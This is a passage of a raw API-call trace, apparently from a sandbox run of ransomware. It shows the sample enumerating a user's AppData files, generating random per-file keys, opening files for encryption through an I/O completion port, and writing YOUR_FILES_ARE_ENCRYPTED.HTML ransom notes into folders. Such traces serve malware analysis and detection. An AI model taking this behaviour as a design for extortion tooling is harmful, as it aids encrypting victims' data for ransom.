nFileSizeHigh=0x0, nFileSizeLow=0xa1c5, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="l4N-yLZqAqIjN0Qs7v.mp3", cAlternateFileName="L4N-YL~1.MP3")) returned 1 [0122.883] StrStrIW (lpFirst="l4N-yLZqAqIjN0Qs7v.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.883] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\l4N-yLZqAqIjN0Qs7v.mp3") returned 64 [0122.883] PathFindExtensionW (pszPath="l4N-yLZqAqIjN0Qs7v.mp3") returned=".mp3" [0122.883] lstrlenW (lpString=".mp3") returned 4 [0122.883] PathFindExtensionW (pszPath="l4N-yLZqAqIjN0Qs7v.mp3") returned=".mp3" [0122.883] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\l4N-yLZqAqIjN0Qs7v.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\l4n-ylzqaqijn0qs7v.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0122.884] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=41413) returned 1 [0122.885] GetProcessHeap () returned 0x600000 [0122.885] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0122.885] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="07") returned 2 [0122.885] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="65") returned 2 [0122.885] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="4D") returned 2 [0122.886] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="8E") returned 2 [0122.886] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="E8") returned 2 [0122.886] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="E7") returned 2 [0122.886] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="80") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="4A") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="74") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="C1") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="A6") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="71") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="07") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="02") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="94") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="03") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="62") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="7F") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="E5") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="DC") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="62") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="2B") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="3F") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="0F") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="87") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="BA") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="D2") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="6D") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="B0") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="3D") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="B8") returned 2 [0122.886] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="1C") returned 2 [0122.887] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\l4N-yLZqAqIjN0Qs7v.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\l4N-yLZqAqIjN0Qs7v.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\l4N-yLZqAqIjN0Qs7v.mp3" [0122.887] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.887] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0122.889] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1061ac0, ftCreationTime.dwHighDateTime=0x1d700ef, ftLastAccessTime.dwLowDateTime=0x2b5c8c30, ftLastAccessTime.dwHighDateTime=0x1d7013c, ftLastWriteTime.dwLowDateTime=0x2b5c8c30, ftLastWriteTime.dwHighDateTime=0x1d7013c, nFileSizeHigh=0x0, nFileSizeLow=0x30fb, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="lPqr_VhdR75b7n5r.gif", cAlternateFileName="LPQR_V~1.GIF")) returned 1 [0122.893] StrStrIW (lpFirst="lPqr_VhdR75b7n5r.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.893] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lPqr_VhdR75b7n5r.gif") returned 62 [0122.893] PathFindExtensionW (pszPath="lPqr_VhdR75b7n5r.gif") returned=".gif" [0122.893] lstrlenW (lpString=".gif") returned 4 [0122.893] PathFindExtensionW (pszPath="lPqr_VhdR75b7n5r.gif") returned=".gif" [0122.893] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lPqr_VhdR75b7n5r.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\lpqr_vhdr75b7n5r.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0122.894] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=12539) returned 1 [0122.894] GetProcessHeap () returned 0x600000 [0122.894] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0122.895] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="BB") returned 2 [0122.895] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="D4") returned 2 [0122.895] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="5C") returned 2 [0122.895] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="4A") returned 2 [0122.895] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="9B") returned 2 [0122.895] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="B5") returned 2 [0122.895] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="83") returned 2 [0122.895] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="49") returned 2 [0122.895] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="AD") returned 2 [0122.895] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="8D") returned 2 [0122.895] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="24") returned 2 [0122.895] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="28") returned 2 [0122.895] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="59") returned 2 [0122.895] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="C0") returned 2 [0122.895] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="C2") returned 2 [0122.895] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="FE") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="3D") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="63") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="CE") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="18") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="65") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="FF") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="2D") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="78") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="EC") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="91") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="2D") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="50") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="AA") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="92") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="3C") returned 2 [0122.896] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="4B") returned 2 [0122.897] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lPqr_VhdR75b7n5r.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lPqr_VhdR75b7n5r.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lPqr_VhdR75b7n5r.gif" [0122.897] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.897] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0122.900] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf56273b0, ftCreationTime.dwHighDateTime=0x1d6ff8d, ftLastAccessTime.dwLowDateTime=0xc7593b30, ftLastAccessTime.dwHighDateTime=0x1d706da, ftLastWriteTime.dwLowDateTime=0xc7593b30, ftLastWriteTime.dwHighDateTime=0x1d706da, nFileSizeHigh=0x0, nFileSizeLow=0x154e2, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Lqpw8UFBam.wav", cAlternateFileName="LQPW8U~1.WAV")) returned 1 [0122.900] StrStrIW (lpFirst="Lqpw8UFBam.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.900] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Lqpw8UFBam.wav") returned 56 [0122.900] PathFindExtensionW (pszPath="Lqpw8UFBam.wav") returned=".wav" [0122.900] lstrlenW (lpString=".wav") returned 4 [0122.900] PathFindExtensionW (pszPath="Lqpw8UFBam.wav") returned=".wav" [0122.900] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Lqpw8UFBam.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\lqpw8ufbam.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0122.903] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=87266) returned 1 [0122.903] GetProcessHeap () returned 0x600000 [0122.903] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0122.904] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="AE") returned 2 [0122.904] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="B6") returned 2 [0122.904] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="21") returned 2 [0122.904] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="FE") returned 2 [0122.904] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="DE") returned 2 [0122.904] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="9C") returned 2 [0122.904] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="56") returned 2 [0122.904] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="01") returned 2 [0122.904] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="E5") returned 2 [0122.904] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="5F") returned 2 [0122.904] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="22") returned 2 [0122.904] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="BD") returned 2 [0122.904] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="4B") returned 2 [0122.904] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="A1") returned 2 [0122.904] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="28") returned 2 [0122.904] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="25") returned 2 [0122.904] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="21") returned 2 [0122.904] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="EB") returned 2 [0122.904] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="16") returned 2 [0122.905] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="FE") returned 2 [0122.905] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="50") returned 2 [0122.905] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="D0") returned 2 [0122.905] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="44") returned 2 [0122.905] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="AD") returned 2 [0122.905] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="67") returned 2 [0122.905] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="A9") returned 2 [0122.905] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="B6") returned 2 [0122.905] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="26") returned 2 [0122.905] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="91") returned 2 [0122.905] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="12") returned 2 [0122.905] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="96") returned 2 [0122.905] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="1E") returned 2 [0122.906] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Lqpw8UFBam.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Lqpw8UFBam.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Lqpw8UFBam.wav" [0122.906] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.906] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0122.911] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa92f1c4e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f1c4e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0122.911] StrStrIW (lpFirst="Microsoft", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.912] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft") returned 51 [0122.912] GetProcessHeap () returned 0x600000 [0122.912] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0122.913] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft" [0122.913] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\*" [0122.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName=".", cAlternateFileName="")) returned 0x626778 [0122.913] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="..", cAlternateFileName="")) returned 1 [0122.913] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="AddIns", cAlternateFileName="")) returned 1 [0122.913] StrStrIW (lpFirst="AddIns", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.913] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns") returned 58 [0122.913] GetProcessHeap () returned 0x600000 [0122.913] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0122.914] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns" [0122.914] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\*" [0122.914] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0122.915] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.915] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0122.915] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0122.915] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0122.915] GetProcessHeap () returned 0x600000 [0122.915] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\addins\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0122.917] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0122.918] CloseHandle (hObject=0x308) returned 1 [0122.918] GetProcessHeap () returned 0x600000 [0122.918] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.918] GetProcessHeap () returned 0x600000 [0122.918] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0122.918] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e898ff, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0122.918] StrStrIW (lpFirst="Bibliography", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.918] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography") returned 64 [0122.918] GetProcessHeap () returned 0x600000 [0122.918] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0122.918] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography" [0122.918] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\*" [0122.919] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0122.919] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, 